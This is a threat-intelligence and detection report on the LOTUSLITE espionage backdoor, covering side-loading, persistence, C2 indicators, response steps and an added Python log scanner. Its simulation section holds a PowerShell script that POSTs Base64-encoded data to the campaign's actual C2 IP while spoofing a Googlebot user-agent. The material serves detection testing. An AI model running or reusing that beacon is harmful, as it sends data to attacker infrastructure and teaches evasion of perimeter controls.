LOTUSLITE Campaign: Targeted Espionage Driven by Geopolitical Narratives
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Acronis TRU observed a targeted espionage operation aimed at U.S. government organizations that delivered a malicious DLL backdoor, LOTUSLITE, inside a politically themed ZIP archive. A companion loader executable side-loads the DLL, after which the backdoor beacons to a hard-coded C2 endpoint over HTTPS while spoofing a Googlebot user-agent. The operators establish persistence by creating a dedicated ProgramData directory and adding a Run registry entry. Based on overlapping tradecraft, the activity was linked to Mustang Panda.
Investigation
Analysts unpacked the ZIP and identified the loader binary (Maduro to be taken to New York.exe) alongside the weaponized DLL (kugou.dll). The analysis documented the DLL sideloading flow, beaconing behavior, mutex usage, and the exact persistence artifacts created on the host. Infrastructure review attributed communications to a single IP (172.81.60.97) and a spryt.net-hosted domain, reportedly hosted in Phoenix, Arizona. Attribution to Mustang Panda was assessed with moderate confidence due to shared tactics and infrastructure patterns.
Mitigation
Acronis detections relied on SHA-256 hashes for the malicious binaries and highlighted the specific ProgramData persistence folder and Run key location. Network controls should flag outbound HTTPS connections to the identified IP/domain when paired with a Googlebot user-agent string. Reduce persistence by preventing execution of unknown binaries from ProgramData and removing the associated Run registry entry when discovered.
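The network control described above, as an added example that is not part of the Acronis report: a small Python scanner that classifies proxy-log lines by pairing the report's C2 IP with the Googlebot user-agent. The log format, the client addresses and the domain placeholder are constructed; the "low" tier (any internal client sending a Googlebot user-agent outbound) is a heuristic that goes beyond the report.

```python
import re
from typing import Optional

# Indicators from the LOTUSLITE report above. The report names the C2 IP;
# it does not print the domain string, so that entry is a labelled placeholder.
C2_IPS = {"172.81.60.97"}
C2_DOMAINS = {"c2-domain-from-report.placeholder"}

# Constructed proxy-log sample (not real telemetry). Fields:
# client_ip dest_ip host method "user-agent"
SAMPLE_PROXY_LOG = """\
10.0.0.15 142.250.80.46 www.google.com GET "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
10.0.0.15 172.81.60.97 - POST "Googlebot"
10.0.0.22 203.0.113.8 cdn.example.net GET "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
10.0.0.9 172.81.60.97 - GET "Mozilla/5.0"
10.0.0.30 198.51.100.4 c2-domain-from-report.placeholder POST "Googlebot"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')


def classify(line: str) -> Optional[dict]:
    """Return an alert dict for one proxy-log line, or None if benign."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None  # unparseable line: skip rather than guess
    client, dest_ip, host, method, ua = m.groups()
    ioc_hit = dest_ip in C2_IPS or host.lower() in C2_DOMAINS
    crawler_ua = "googlebot" in ua.lower()
    if ioc_hit and crawler_ua:
        severity = "high"    # the exact pairing the report describes
    elif ioc_hit:
        severity = "medium"  # known C2 infrastructure, different user-agent
    elif crawler_ua:
        severity = "low"     # heuristic: internal clients do not crawl as Googlebot
    else:
        return None
    return {"client": client, "dest_ip": dest_ip, "host": host,
            "method": method, "severity": severity}


def scan(log_text: str) -> list:
    """Run classify() over every line and keep only the alerts."""
    return [a for a in map(classify, log_text.splitlines()) if a]


if __name__ == "__main__":
    for alert in scan(SAMPLE_PROXY_LOG):
        print(alert)
```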
Response
Immediately isolate affected endpoints, capture volatile data, and preserve the malicious binaries for analysis. Remove the created ProgramData folder and delete the corresponding Run registry value to break persistence. Block connectivity to the C2 IP and domain, and update endpoint detections with the provided file hashes and mutex indicator. Finally, conduct an environment-wide hunt for additional hosts exhibiting the same loader and DLL signatures.
Attack Flow
Detections
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
IOCs (SourceIP) to detect: LOTUSLITE: Targeted espionage leveraging geopolitical themes
IOCs (DestinationIP) to detect: LOTUSLITE: Targeted espionage leveraging geopolitical themes
IOCs (HashSha256) to detect: LOTUSLITE: Targeted espionage leveraging geopolitical themes
Detection of LOTUSLITE Backdoor C2 Communication [Windows Network Connection]
Targeted Espionage Campaign Using LOTUSLITE Backdoor [Windows Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands:
The attacker has compromised a workstation and installed the LOTUSLITE backdoor. To exfiltrate data while blending in with legitimate web-crawler traffic, the backdoor issues an HTTP POST to the hard-coded C2 server 172.81.60.97. It explicitly sets the User-Agent header to "Googlebot" to masquerade as a search-engine crawler, hoping to slip past perimeter defenses that whitelist such agents. The payload contains Base64-encoded exfiltrated data.
Regression Test Script:
# LOTUSLITE C2 simulation – powershell
$c2 = "http://172.81.60.97/receive"
$ua = "Googlebot"
$data = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("sensitive data payload"))
$body = @{ "data" = $data }
try {
    Invoke-WebRequest -Uri $c2 -Method POST -Headers @{ "User-Agent" = $ua } -Body ($body | ConvertTo-Json -Compress) -UseBasicParsing
    Write-Host "C2 request sent successfully."
} catch {
    Write-Error "C2 request failed: $_"
}
Cleanup Commands:
# Remove any temporary files or lingering network connections
# (path separator restored: "$env:TEMPlotuslite_temp*" would expand an empty variable)
Remove-Item -Path "$env:TEMP\lotuslite_temp*" -ErrorAction SilentlyContinue
# (No persistent services were created in this simulation)
Write-Host "Cleanup complete."